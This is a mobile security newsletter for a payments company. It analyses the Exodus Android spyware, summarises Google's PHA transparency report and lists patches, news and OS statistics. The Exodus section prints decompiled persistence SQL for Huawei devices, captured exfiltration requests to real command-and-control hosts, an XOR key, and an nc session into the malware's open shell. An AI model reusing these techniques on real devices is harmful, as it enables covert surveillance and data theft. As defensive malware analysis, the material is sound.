Bancontact Payconiq Company

SEPA Rulebooks Scheme Manuals Remote Domain 46D0 – Schedules 1, 2, and 3 – News 66 Mobile App Security Guidelines

Android, iOS Newsletter 66

Confidential

COPYRIGHT This document is confidential and protected by copyright. Its contents must not be disclosed or reproduced in any form whatsoever without the prior written consent of Bancontact Payconiq Company sa/nv. Except with respect to the limited license to download and print certain material from this document for non-commercial and personal use only, nothing contained in this document shall grant any license or right to use any of Bancontact Payconiq Company sa/nv’s proprietary material.

AUTHORS This monthly newsletter is written by NVISO Labs, experts in mobile security, on behalf of Bancontact Company sa/nv.

ABOUT NVISO

NVISO is a consultancy firm exclusively focusing on IT security. NVISO has a very clear sector focus with several references in the financial and governmental sectors. The Research and Development department of NVISO is NVISO Labs, whose goals are to allow our people to increase their skills and knowledge, to come up with innovative service offerings, to contribute to the security community, and to give valuable insights to our clients. The fundamental values of NVISO are client satisfaction, focus, entrepreneurship, innovation, and ability to adapt. Our mission is to be an innovative and respected partner for our clients. For more information, we are happy to refer you to our website: https://www.nviso.be. If you want to stay up to date with our latest research and other activities of NVISO Labs, we refer you to our blog: https://blog.nviso.be

Newsletter 66 Copyright Bancontact Payconiq Company nv/sa Page 2 of 22

Confidential

Table of Contents

Table of Contents 3 1 Summary of security impacts 4 2 Vulnerabilities & Malware 5 2.1 iOS Malware 5 2.2 Android Malware 6 Exodus spyware 6 3 Case study – Android Security Transparency Report 12 3.1 Potential Harmful Applications (PHAs) 12 3.2 Percentage of devices with PHA by market segment 13 3.3 Percentage of devices with PHA by Android version 13 3.4 Percentage of devices with PHA by top countries 14 3.5 Percentage of PHA installs by market segment 14 3.6 Percentage of PHA installs by categories 15 3.7 Google Play Protect 16 3.8 Conclusion 16 4 Security updates 17 4.1 iOS security update 17 4.2 Android security update 17 5 Security news 18 5.1 Mobile security news 18 Face unlock feature of Samsung Galaxy S10 not foolproof 18 Google implements ‘while-app-in-use’ location tracking 18 High-risk vulnerability on Android devices could steal personal data 18 Preinstalled Android apps often not as innocent as users might think 18 5.2 General security news 19 Android trojan Gustuff could target over 100 global banking apps 19 Comcast mobile phone service sets same PIN for all accounts 19 Major Android apps sharing data with Facebook 20 New iOS phishing scam collecting Facebook credentials 20 Facebook app’s logging passwords in plaintext 20 6 Statistics 21 6.1 OS market shares 21 6.2 iOS 21 6.3 Android 22

Newsletter 66 Copyright Bancontact Payconiq Company nv/sa Page 3 of 22

Confidential

1 Summary of security impacts

In April, two types of Android malware have been discovered, while no new security vulnerabilities were discovered on iOS. The first newly discovered Android malware, dubbed Exodus, does not target banking applications directly but could give some impact since it has a quite extensive and advanced list of data collection and exfiltration capabilities. This information could later be used to perform a targeted attack on the infected devices with installed banking applications. Though only recently discovered, the malware may have been active since 2016, targeting Italian mobile users. The second malware, Gustuff, targets more than 100 international banks, 32 cryptocurrency apps and popular ecommerce marketplaces. Gustuff infects Android devices through SMS messages containing a link to a malicious APK. Afterwards, it spreads itself by sending the same malicious SMS to the device’s contact list. It abuses Android’s Accessibility Service to implement auto fill-in fields in legitimate banking and cryptocurrency apps. However, no technical details are disclosed by the researchers; therefore we listed it in general security news section for the moment. Even though no new iOS vulnerabilities were found, Apple did patch 51 vulnerabilities in their major 12.2 iOS update. Most of the vulnerabilities were related to WebKit, where the most critical one allowed an attacker to execute arbitrary code, disclose sensitive user information and perform cross-site scripting attacks by convincing a victim to open a malicious file. Android also fixed some important vulnerabilities in their monthly security update. The update fixes 89 vulnerabilities spread across several components. The most critical issue allowed a remote attacker to gain arbitrary code execution within a privileged process by simply having the victim opening a malicious media file. The case study of this month focuses on the Android Security Transparency Report, a study performed by the Android team on Potentially Harmful Applications or PHAs.

Newsletter 66 Copyright Bancontact Payconiq Company nv/sa Page 4 of 22

Confidential

2 Vulnerabilities & Malware

2.1 iOS Malware

No new malware was identified for iOS.

Newsletter 66 Copyright Bancontact Payconiq Company nv/sa Page 5 of 22

Confidential

2.2 Android Malware

Exodus spyware

Overall risk: Medium Impact: High Likelihood: Low

Summary Researchers at Security Without Borders identified a new Android spyware dubbed Exodus which supposedly infected a few hundred devices through the Google Play Store from 2016 to 2019. The spyware is composed out of two stages. The first stage is distributed through a number of malicious apps that include a dropper, while the second stage contains the main data collection and exfiltration capabilities. Based on available Google Play Store statistics, all the dropper-containing apps have a few dozen of installs while one has over 350 installs. Since the dropper-containing apps disguise as originating from Italian mobile operators, the majority of all victims are located in Italy. Other observations like decompiled source code, very specific XOR keys and a favicon, link the spyware to an Italian company creating video surveillance systems. Since the spyware only spreads through the Google Play Store targeting Italian users, the likelihood of being infected is low. However, once the spyware gains access to your mobile device it could launch an extensive list of data collection and exfiltration techniques including a reverse shell. Therefore, we rate the impact as high. Details The Exodus spyware is composed out of two stages called Exodus One and Exodus Two. The first stage acts as a dropper and is contained in several malicious apps which made it to the Google Play Store over the course of two years. The apps remained available on the Google Play Store and re- uploaded once they were removed. All the droppers had one characteristic in common: They disguised themselves as an unspecified Italian mobile operator.

Figure 2 - Code that starts proxy server (Source)

Figure 1: Exodus One dropper disguising Italian mobile operator apps (source)

Newsletter 66 Copyright Bancontact Payconiq Company nv/sa Page 6 of 22

Confidential

Exodus One collects some basic information of the infected devices and sends it back to the Command & Control server (C&C). Depending on the version and variant of Exodus One, it communicates with a different C&C server. However, they all follow the same process of exfiltrating the basic device information. The following POST request is sent to the server containing the app package name, IMEI number and an encrypted body:

POST /eddd0317-2bdc-4140-86cb-0e8d7047b874 HTTP/1.1 User-Agent: it.promofferte:[REDACTED] Content-Type: application/octet-stream Content-Length: 256 Host: 54.71.249.137 Connection: Keep-Alive Accept-Encoding: gzip .....,Q... N.v..us.R...... /...\D..5p..q ...... 4 [REDACTED] gl.O..Y.Q..)3...7K.:(..5...w...... L.....p.L2...... _jK...... g}...15...... r.x.x!.....?..O.z......

HTTP/1.1 200 OK Server: nginx/1.4.6 (Ubuntu) Date: [REDACTED] Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip

358fde5fe8f91b132636a6d5a7148070

Looking into the source code, the encrypted body is composed of the joint string of the following identifiers: deviceId, lineNumber, subscriberId, networkOperatorName, networkType and simState. Afterwards, the joint string is XOR encrypted with the static key ‘Kjk1MmphFG’. Based on this information sent to the C&C server, the attackers could decide whether to push the second stage of the spyware or not. After some time, the dropper made another POST request to the C&C server, where the server responded with the second stage of the Exodus spyware Exodus Two. Exodus Two is packaged as a jar inside a larger zip archive. In fact, the zip contains binaries of the malware for different architectures: i686, arm, and arm64. The jar itself (mike.jar), implementing the main data exfiltration mechanisms, is dynamically loaded and executed by Exodus one. Once executed, Exodus exploits a feature in Huawei phones for configuring power-saving options of running applications. By performing SQL queries directly on the SQLite database of Huawei’s system manager, the spyware can keep itself running even when the device is locked: if ( !func_sqlite_loaddb((int)"/data/data/com.huawei.systemmanager/databases/Optimize.db", (int)&db_handle) ) { sprintf(&s, "INSERT INTO protectedapps (package_name,list_type) VALUES ('%s','1')", v1, 0); func_sqlite_exec(db_handle, &s, 0, 0, &v4); sprintf(&s, "DELETE FROM backgroundwhiteapps WHERE package_name='%s'", v1); func_sqlite_exec(db_handle, &s, 0, 0, &v4); sprintf(&s, "INSERT INTO backgroundwhiteapps (package_name) VALUES ('%s')", v1); func_sqlite_exec(db_handle, &s, 0, 0, &v4); func_sqlite_free(v4); }

Newsletter 66 Copyright Bancontact Payconiq Company nv/sa Page 7 of 22

Confidential

In order to remove traces, Exodus Two attempts to remove itself from the power usage statistics in a similar fashion: if ( !func_sqlite_loaddb((int)"/data/data/com.huawei.systemmanager/databases/stusagestat.db", (int)&db_handle) ) { sprintf(&s, "REPLACE INTO default_value_table (pkg_name,control,protect,keytask) VALUES ('%s',0,2,0)", v1, 0); func_sqlite_exec(db_handle, &s, 0, 0, &v4); sprintf(&s, "DELETE FROM st_key_procs_table WHERE st_key_process='%s'", v1); func_sqlite_exec(db_handle, &s, 0, 0, &v4); sprintf(&s, "INSERT INTO st_key_procs_table (st_key_process) VALUES ('%s')"); func_sqlite_exec(db_handle, &s, 0, 0, &v4); sprintf(&s, "REPLACE INTO st_protected_pkgs_table (pkg_name,is_checked) VALUES ('%s',1)", v1); func_sqlite_exec(db_handle, &s, 0, 0, &v4); func_sqlite_free(v4); }

Data exfiltration Exodus Two offers the following wide range of data collection and exfiltration capabilities: • Retrieve a list of installed applications. • Dump data from the Viber messenger • Record surroundings using the built-in app. microphone. • Extract logs from WhatsApp. • Retrieve the browsing history and • Retrieve media exchanged through bookmarks from Chrome and WhatsApp. SBrowser (the browser shipped with • Extract the Wi-Fi network's password. Samsung phones). • Extract data from WeChat app. • Extract events from the Calendar app. • Extract current GPS coordinates of the • Extract the calls log. phone • Record phone calls audio in 3gp format. • Take pictures with the embedded camera. • Collect information on surrounding cellular towers (BTS). • Extract the address book. • Extract the contacts list from the Facebook app. • Extract logs from Facebook Messenger conversations. • Take a screenshot of any app in foreground. • Extract information on pictures from the Gallery. • Extract information from the GMail app. • Dump data from the IMO messenger app. • Extract call logs, contacts and messages from the Skype app. • Retrieve all SMS messages. • Extract messages and the encryption key from the Telegram app.

Newsletter 66 Copyright Bancontact Payconiq Company nv/sa Page 8 of 22

Confidential

Retrieving this data from the system often does not requires root privileges. However, if root privileges are required, Exodus Two includes a binary in the zip archive which takes care of privilege escalation. Upon execution the binary, called ‘rootdaemon’, attempts to jailbreak the device using the well-known DirtyCow exploit (https://dirtycow.ninja). Afterwards, the main executable can connect and interact with the ‘rootdaemon’ through various TCP ports binding on localhost. Each local port is responsible for a different data collection capability which requires root privileges. For example, connecting to port 6209 on localhost will initiate the Telegram extraction service.

tcp 0 0 0.0.0.0:6201 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:6205 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:6209 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:6211 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:6212 0.0.0.0:* LISTEN

Once mike.jar has acquired the data extracted by the rootdaemon, it is XOR encrypted and stored in the .lost+found folder on the device’s SD card in a file containing the extraction data and IMEI number. For example:

/storage/emulated/0/.lost+found/0BBDA068-9D27-4B55-B226- 299FCF2B4242/DD_MM_2019_HH_mm_ss_XXXXXXXXXXXXX.txt.crypt

Eventually, the data collected in the .lost+found folder is sent to the C&C server using a PUT request:

PUT /7d2a863e-5899-4069-9e8e-fd272896d4c7/A35081BD-4016-4C35-AA93-38E09AF77DBA.php HTTP/1.1 User-Agent: it.promofferte:[REDACTED] DETAILS: {"date":"[REDACTED]","imei":"[REDACTED]","filenameb64":"[REDACTED]\u003d\u003d","filepathb64":"[REDACTED]\u003d"," fileDirectoryb64":"[REDACTED]\u003d","uploadType":"WIFIPASSWORD","encrypted":true} Content-Type: application/octet-stream Content-Length: 277 Host: ws.my-local-weather.com Connection: Keep-Alive Accept-Encoding: gzip l.9TqRuosV..~.:. ...` [REDACTED] ....s)Sp.^...5z..d0pRu

HTTP/1.1 200 OK Server: nginx Date: Fri, 18 Jan 2019 15:53:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip

OK

Local and Remote shells The Exodus spyware not only contains an extensive list of data collection and exfiltration capabilities but also offers a reverse shell to the attackers connecting back to the C&C server. Immediately after executing the mike.jar of Exodus Two, it checks whether no other instance of itself is already running and if port 6842 is still available. If this is ok, the spyware attempts to create a reverse shell (/system/bin/sh) to the C&C server on port 22011.

Newsletter 66 Copyright Bancontact Payconiq Company nv/sa Page 9 of 22

Confidential

Figure 2: Exodus spyware initiating a reverse shell (source) Although most of the data sent to the C&C server is encrypted, the reverse shell is set up without any encryption, making it vulnerable to man-in-the-middle attacks. On top of opening a reverse shell to the C&C server, the malware also binds a local shell on 0.0.0.0:6842. While this allows the malware to execute various commands on the device, it also opens an attack vector for other attackers on the same network: user@laptop:~$ nc 192.168.1.99 6842 -v Connection to 192.168.1.99 6842 port [tcp/*] succeeded! u0_a114@hammerhead:/ $ id id uid=10114(u0_a114) gid=10114(u0_a114) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),50114(all_a114) context=u:r:untrusted_app:s0

Origination Due to the fact the first stage of the Exodus spyware was contained in apps on the Google Play Store disguising as Italian mobile operators, it is likely that an Italian actor is behind the whole malware. This assumption is reinforced after investigating the decompiled classes.dex file, containing Italian instructions: a("MUNDIZZA", "09081427-FE30-46B7-BFC6-50425D3F85CC", ".*", false); this.b.info("UPLOADSERVICE Aggiunti i file mundizza. Dimensione coda upload {}", Integer.valueOf(this.c.size()));

‘Mundizza” is the native language of a city in the south of Italy, Cantazaro. Moreover, the XOR key used in Exodus One is ‘Rino Gattuso’, a famous footballer originating from the region around Cantazaro. The TLS certificate assigned to the domain of the C&C server (https://ws.my-local-weather.com) is a self-signed certificate which has been used on a dozen of other IP addresses. All the IP addresses behaved the same way when connecting to port 443 by showing a basic authentication prompt. Supposedly, these are all different clones of the C&C server.

Newsletter 62 Copyright Bancontact Payconiq Company nv/sa Page 10 of 22

Confidential

The favicon of these webpages can be linked to the Italian company eSurv, which is in fact located in Cantazaro. eSurv is a company creating video surveillance systems including CCTV management systems, license plate recognition software and surveillance drones.

Figure 3: eSurv login panel (source)

All these observations might link eSurv to the development and distribution of the Exodus spyware. According to the WhoIs information, the C&C server is active since at least April 2017 and impersonating a legitimate weather service called ‘AccuWeather’. Mitigation The root exploits included in these types of malware are often well-known vulnerabilities that have already been patched on recent Android versions. Therefore we recommend developers to only support recent versions in their apps. (See last month’s edition 65 of this newsletter for a deep dive case study regarding Android version support in apps) In addition, developers can implement root detection to warn users when the application is started on a rooted device. According to Google, all droppers for the Exodus spyware have been taken down from the Google Play Store. However, we recommend to still be cautious with installing applications, even when they originate from a trusted store like the Google Play Store. Some of the following characteristics might indicate a malicious application has still found its way into the Google Play Store: • The application has just been uploaded to the Google Play Store. • A (very) small number of downloads. • A (very) small of reviews/stars which are artificially high. • Upon installation, the application asks for permissions which it normally should not require. The spyware uses DirtyCow to perform privilege escalation and unlock a dozen of data collection and exfiltration mechanisms requiring root privileges. We recommend users to make sure their devices are up-to-date at all times in order to have patches against the DirtyCow exploit. Source: https://securitywithoutborders.org/blog/2019/03/29/exodus.html

Newsletter 62 Copyright Bancontact Payconiq Company nv/sa Page 11 of 22

Confidential

3 Case study – Android Security Transparency Report

Android is prioritizing the security of its OS and as part of this effort they released the Android Security Transparency report. Below you will find a summary of this report as well as quick look into the most important parts of the report. Android is by far the operating system with the largest user base, as it is installed on over 2 billion devices worldwide. The Android team is committed to safeguarding the privacy and security of each of its users. The report focusses on the efforts made to reduce Potential Harmful Applications (PHA) installed.

3.1 Potential Harmful Applications (PHAs)

Google uses the term Potential Harmful Application (PHA) for apps that pose a potential security risk as they found the term “Malware” not defined enough. PHA classifications change over the years to keep up with current ecosystem. Below you will an explanation of the different categories within PHAs:

• Backdoors • Commercial Spyware • Data Collection • Denial of Service • Hostile Downloader • Mobile Billing Fraud • SMS Fraud • Call Fraud • Toll Fraud • Non-Android Threat • Phishing • Privilege Escalation • Ransomware • Rooting • Spam • Spyware • Trojan While most of these categories are self-explanatory, we will dive into a few them. A backdoor according to Google is defined as follows: “An application that allows the execution of unwanted, potentially harmful, remote-controlled operations on a device."1 It is a description of how potential harmful actions can occur. Commercial spyware apps get classified as such when it is detected that the app sends personal identifiable data to a party other than the PHA provider. Data Collection is a rather vague category, Google assigns this when an application collects any of the following information without user consent: • Information about installed applications • Information about third-party accounts • Names of files on the device Toll Fraud is another classification that needs a bit of explanation. It is fraud that that tricks users to subscribe or purchase content via their mobile phone bill. An example of such fraud is making the victim clicking on a button in a silently loaded transparent web view, to initiate a recurring subscription.

1 https://source.android.com/security/reports/Google_Android_Security_PHA_classifications.pdf

Newsletter 62 Copyright Bancontact Payconiq Company nv/sa Page 12 of 22

Confidential

These categories can change to match the current mobile ecosystem. Google transparently reports on any changes in the categories in their quarterly security transparency report.

3.2 Percentage of devices with PHA by market segment

Android launched Google Play Protect in 2017 to improve the security of Android devices across the world. Play Protect is made for detecting and removing PHAs from certified Android devices regardless of where the app was installed from. Below you will see the percentage of Android devices with Google Play Protect enabled that have one or more PHAs installed2. Keep in mind that 1% still means that around 10 million devices around the world have PHAs installed.

Figure 4 - Percentage of Android devices with Google Play Protect enabled that have one or more PHAs installed

3.3 Percentage of devices with PHA by Android version

The Android versions in the charts below cover approximately 90% of the Android ecosystem. The graphs show the percentage of devices with at least one PHA installed by Android version. What is interesting here is that the general percentages of PHAs found has increased from the last period across all OS versions. This could mean that there are more PHA or that Google Play Protect is being enabled on more devices, or both.

Figure 5 - Percentage of devices with at least one PHA installed by Android version, Oct-Dec vs Jul-Sept 2018

2 All pictures in this section are copied from https://transparencyreport.google.com/android- security/overview?hl=en

Newsletter 62 Copyright Bancontact Payconiq Company nv/sa Page 13 of 22

Confidential

OS JUL 2018 – SEP 2018 OCT 2018 – DEC 2018 KitKat 0.386% 0.415% Lollipop 0.594% 0.639% Marshmallow 0.509% 0.665% Nougat 0.323% 0.397% Oreo 0.159% 0.229% Pie 0.064% 0.206%

3.4 Percentage of devices with PHA by top countries

The chart below displays PHAs found in the top 10 countries with the most Android devices. Indonesia, India and the US have the highest percentage of PHA-infected devices.

Figure 6 - Percentage of devices per top 10 country, with at least one PHA

3.5 Percentage of PHA installs by market segment

Below you will find a representation of install rates broken down by quarter. As you can see the amount of PHAs that are being installed outside of the Google Play Store is decreasing. It shows that the efforts made by Google to improve the security of the Android platform are paying off.

Newsletter 62 Copyright Bancontact Payconiq Company nv/sa Page 14 of 22

Confidential

Figure 7 - Quarterly PHA install rates for Google Play and outside of Google Play

3.6 Percentage of PHA installs by categories

Below the graph shows the percentage of PHAs per category. The numbers include PHAs installed from both the Google Play Store and from other application stores. When we compare Q3 to Q4 2018, we see that Trojans are becoming more common with an increase from 0.00036% to 0.02003%. To put it in more manageable numbers it’s an increase from roughly 3500 to 200.000 Trojan PHA installs. Click fraud PHAs however have seriously declined in comparison with the last period.

Figure 8 - top PHA categories broken down by percentage against overall app installs, Oct-Dec vs Jul-Sept 2018

Newsletter 62 Copyright Bancontact Payconiq Company nv/sa Page 15 of 22

Confidential

3.7 Google Play Protect

Google Play Protect detects and removes PHAs on Android devices by doing the following things: • Periodic online and offline PHA scans. • Automatically disabling or removing PHA threats • Uploading new apps to the cloud for scanning • Google Play Protects also uses SafetyNet Signal Detection3 • Google Play Protect uses machine learning models to improve its algorithms

3.8 Conclusion

In conclusion, Google is actively trying to improve the security of their Android platform. Introducing Google Play Protect has helped them to improve the general security posture of the OS. It actively helps to improve the security of the Android landscape, furthermore it provides developers with good guidelines and active policies in order to ensure the protection and privacy of its users. By transparently reporting their findings, Google is keeping Android developers up to date on what is happening with PHAs and how to protect their data by following their security guidelines.

3 SafetyNet Signal Detection is an API that allows developers to assess the device their app is running on. More info on this API can be found at: https://developer.android.com/training/safetynet/attestation

Newsletter 62 Copyright Bancontact Payconiq Company nv/sa Page 16 of 22

Confidential

4 Security updates

4.1 iOS security update

On March 25th, Apple released their latest major update for their mobile devices: iOS 12.2. The update included a total of 51 security vulnerabilities. Most of the vulnerabilities are related to Apple’s web rendering engine, WebKit. One of the vulnerabilities (CVE-2019-8562) allowed an attacker to execute arbitrary code, disclose sensitive user information and perform cross-site scripting attacks by convincing a victim to open a malicious file. Another WebKit vulnerability (CVE-2019-6222) allowed malicious websites to access the microphone without notifying the user by displaying the ‘microphone is currently in use’ message. A logical bug in WebKit (CVE-2019-8503) enabled cross-origin attacks where a malicious webpage can execute scripts in the context of another site. Additionally, Apple patched six vulnerabilities in the iOS kernel. These vulnerabilities could allow an attacker to elevate privileges and even crash the system or corrupt the kernel memory. The full security update description can be found on https://support.apple.com/en-us/HT209599

4.2 Android security update

On April 5th, the Android development team released their security update in which 89 vulnerabilities were fixed. Eight vulnerabilities are related to privilege escalation, three vulnerabilities allowed an attacker to gain remote code execution, four vulnerabilities are linked to identity disclosure while all the others were given the N/A tag. The most severe critical vulnerability allowed a remote attacker to gain arbitrary code execution within a privileged process by simply making the victim open a malicious media file. Technical details of the vulnerability are currently not available. Google did not find any indication that the bugs have been exploited or abused in the wild. All other bugs were classified as high and have been patched. Most of the vulnerabilities were found in system and Qualcomm components. More information can be found on the April 2019 security bulletin: https://source.android.com/security/bulletin/2019-04-01

Newsletter 62 Copyright Bancontact Payconiq Company nv/sa Page 17 of 22

Confidential

5 Security news

5.1 Mobile security news

Face unlock feature of Samsung Galaxy S10 not foolproof The new Samsung Galaxy S10, which has been released in March 2019, can easily be tricked in various ways. Showing a video of the owner in front of the camera unlocks the device. Also, the phone has a hard time distinguishing between siblings. Security researcher Jane Wong was able to unlock her brother’s phone using her own face. Worst of all, some people were able to fool the face unlock feature by waving a still photo in front of the camera. This flaw comes as a surprise since previous Samsung phones, starting from Galaxy S8, are implementing a more secure face unlocking mechanism which used an IR LED and extra front camera to scan your iris. While this technique is more reliable compared to a simple camera, it requires some space for extra hardware. Presumably Samsung cut the extra hardware in order to allow for super slim bezels. Source: https://arstechnica.com/gadgets/2019/03/the-galaxy-s10s-face-unlock-fooled-by-pictures- siblings/

Google implements ‘while-app-in-use’ location tracking In earlier version of Android, it was only possible to have apps either track the user’s location or completely turn off location-tracking. While this could be a convenient feature for some applications, vulnerabilities in these apps could leak your location data causing concerns about your own privacy and physical safety. Starting from Android Q, developers now have a new option to only track the location of users while their app is in use (i.e. when the app is in the foreground). For example, this could be useful when you are just looking for a nearby restaurant on a Yelp-like application. This new option brings Android in line with the location-tracking options in iOS. Source: https://threatpost.com/google-location-tracking-apps/142882/

High-risk vulnerability on Android devices could steal personal Location tracking in data Android Q (source) Sergey Toshin, a security researcher at Positive Technologies, discovered a vulnerability in Android’s WebView, the component which allows web pages to be displayed in apps. The vulnerabilities could be exploited by clicking a link in the WebView to download an instant app. This instant app is a small ‘demo’ app which does not require any installation and runs in a native container with access to a device's hardware. A malicious instant app could read information from the WebView, containing confidential data like browser history, logins and authentication tokens. The vulnerability was present for more than five years in all Android version from 4.4 and up. However, after the researcher contacted Google in January, they quickly patched the bug Source: https://www.ptsecurity.com/ww-en/about/news/high-risk-vulnerability-in-android-devices- discovered-by-positive-technologies/

Preinstalled Android apps often not as innocent as users might think A research conducted by IMDEA Networks Institute revealed some interesting insights in the nature of pre-installed apps of new Android phones. They scanned the firmware of more than 2700 Android users in order to create a dataset of 82501 pre-installed apps. Surprisingly, many of these apps are collecting

Newsletter 62 Copyright Bancontact Payconiq Company nv/sa Page 18 of 22

Confidential personal data like geolocation information, personal email, phone call metadata and contact details. Thanks to potential partnerships and deals by the smartphone vendor, these apps are often given custom permission without informing the users. In many cases, the stolen data was sent directly to advertising companies. Source: https://nakedsecurity.sophos.com/2019/03/27/preinstalled-android-software-is-pilfering-your- data-say-researchers/

5.2 General security news

Android trojan Gustuff could target over 100 global banking apps Researchers at Group-IB discovered a new Android malware dubbed Gustuff targeting more than 100 international banks, 32 cryptocurrency apps and popular ecommerce marketplaces. The malware is designed as a trojan where, once infected, commands are sent from the C&C server to the infected devices. The malware is able to read and send SMS messages, redirect all web traffic through a proxy, transferring files and resetting the device. Initially, Gustuff infects Android devices through SMS containing a link to a malicious APK. Afterwards, it spreads itself by sending the same malicious SMS to the device’s contact list. GuStuff abuses Android’s Accessibility Service to implement its unique feature Automatic Transfer Systems (ATS). This functionality allows the malware to autofill fields in legitimate banking and cryptocurrency apps to speed and scale up thefts. Additionally, the malware can send fake push notifications of legitimate applications. These notifications either link to a fake web page to request banking details or to the legitimate application where the ATS feature automatically fills in malicious payment details. The malware seems to be the successor of the AndyBot malware, which has been around since November 2017, targeting Android phones to steal money using fake websites disguising mobile apps of popular banks. Source: https://www.group-ib.com/media/gustuff/

Comcast mobile phone service sets same PIN for all accounts Two years ago, Comcast launched their mobile service and allowed new customers to port their existing phone numbers from their old carrier. In order to port a phone number, customers had to provide their Comcast account number and a PIN. In order to make the process simpler, Comcast ‘removed’ the PIN and set a default PIN of 0000 for all customers. This way, it became supposedly easy for attackers to hijack someone’s phone number once they obtained the victim’s Xfinity mobile application (source) account number. Some customers in fact reported their numbers had been ported unwillingly and attackers committed identity theft. In order to solve the issue, Comcast changed their porting process by requiring now both your new account number and current address. Source: https://nakedsecurity.sophos.com/2019/03/05/comcast-security-nightmare-default-0000-pin- on-everybodys-account/

Newsletter 62 Copyright Bancontact Payconiq Company nv/sa Page 19 of 22

Confidential

Major Android apps sharing data with Facebook Researchers at Privacy International revealed in December 2018 some well-known Android apps were sharing data with Facebook at the moment they were initially launched. The data was sent even when the users were logged out of Facebook or did not have a Facebook account at all. This month, they retested the vulnerable apps and ascertained two thirds of all the apps fixed the issue and are no longer sharing data with Facebook. However, some major apps, including Yelp and Duolingo, remain vulnerable. Source: https://privacyinternational.org/blog/2758/guess-what-facebook-still-tracks-you-android-apps- even-if-you-dont-have-facebook-account

New iOS phishing scam collecting Facebook credentials A new phishing scam has been discovered fooling users with a realistic looking login process. The scam starts with a cloned and fake webpage of some well-known application (i.e. Airbnb). Once the user clicks the ‘Login with Facebook’ button, the website renders a video imitating the app-switching process on iOS. While the victim thinks he/she is redirected from the webpage to the authentic Facebook app to sign in, a fake version of the Facebook login screen is displayed on the webpage. Users with an eye for detail might spot the original URL remains minimized during the whole process, disclosing to the user that he/she is in fact still on the malicious website. However, according to Avast, a lot of people could still be fooled since the video is authentic. Source: https://blog.avast.com/ios-phishing-scam-steals-facebook-logins

Facebook app’s logging passwords in plaintext A senior Facebook employee, who chooses to stay anonymous, reported hundreds of millions Facebook credentials were stored in plaintext. According to the employee, the plaintext passwords were accessible by thousands of Facebook employees during a time span of several years. The bug came into existence through applications built by Facebook employees logging unencrypted data of Facebook users, storing them on internal company servers.

A few days later, Facebook confirmed the Facebook press post (source) vulnerability and stated they did not find any evidence that anyone internally accessed or abused the logged information. However, they will notify all the affected users. Source: https://krebsonsecurity.com/2019/03/facebook-stored-hundreds-of-millions-of-user- passwords-in-plain-text-for-years/

Newsletter 62 Copyright Bancontact Payconiq Company nv/sa Page 20 of 22

Confidential

6 Statistics

6.1 OS market shares

Series 40 Unknown Windows Phone OS 0,08% 1,65% 0,06%

iOS 28,50%

Android 69,63%

Figure 9 - OS market share (Source) If we compare this month’s operating system market shares to last month’s, we can see a very small increase in Android. In opposition, iOS has slightly decreased compared to last month. All other OS’s didn’t have a lot of fluctuation compared to last month.

6.2 iOS

Other iOS 7.X iOS 8.X iOS 9.X 0,15% 0,12% 2,68% 0,90% iOS 10.X 3,13%

iOS 11.X 11,38%

iOS 12.X 81,67%

Figure 10 - Usage of iOS versions (Source)

Newsletter 62 Copyright Bancontact Payconiq Company nv/sa Page 21 of 22

Confidential

Similar to the previous three months, iOS users continue to shift towards the newest iOS 12 versions which is a good thing. Since the stable release of iOS 12 in mid-September, more than three quarters of all iOS users have installed it. iOS 12.x has seen an increase of 2,15% this month.

6.3 Android

Version Codename Distribution Android 3,90% Android 1.0 0,03% Android 1.1 Petit Four 0,01% Android 1.5 Cupcake 0,07% Android 1.6 Donut 0,14% Android 2.0 Eclair 0,04% Android 2.1 0,06% Android 2.2 Froyo 1,12% Android 2.3 Gingerbread 0,07% Ice Cream Android 4.0 Sandwich 1,36% Android 4.1 Jelly Bean 0,62% Android 4.2 2,39% Android 4.3 0,18% Android 4.4 KitKat 2,67% Android 5.0 Lollipop 1,74% Android 5.1 7,03% Android 6.0 Marshmallow 13,46% Android 6.1 0,05% Android 7.0 Nougat 11,90% Android 7.1 9,07% Android 8.0 Oreo 21,67% Android 8.1 22,71% Android 9.0 Pie 0,73% Android 9.1 0,00% (Source) As Google has stopped publishing updates on their dashboard, the data listed above is taken from NetMarketShare. This is an online service that provides web usage share statistics on real users and is trusted by many respectable vendors. NetMarketShare collects its data from approximately 100 million valid sessions per month extracted from over a thousand different websites. The service uses bot/fraud detection, country level weighting and removes hidden pages from the data to obtain accurate statistics. If we compare these statistics to the ones of the previous dashboard, it seems that the adoption of Androids Oreo has doubled since Google’s last assessment. The usage of all other versions has also decreased, which is a good thing. We can also see that the newest version, Android Pie, has arrived so we can expect to see a slow rise in the adoption of this version in the upcoming months.

(End of document)

Newsletter 62 Copyright Bancontact Payconiq Company nv/sa Page 22 of 22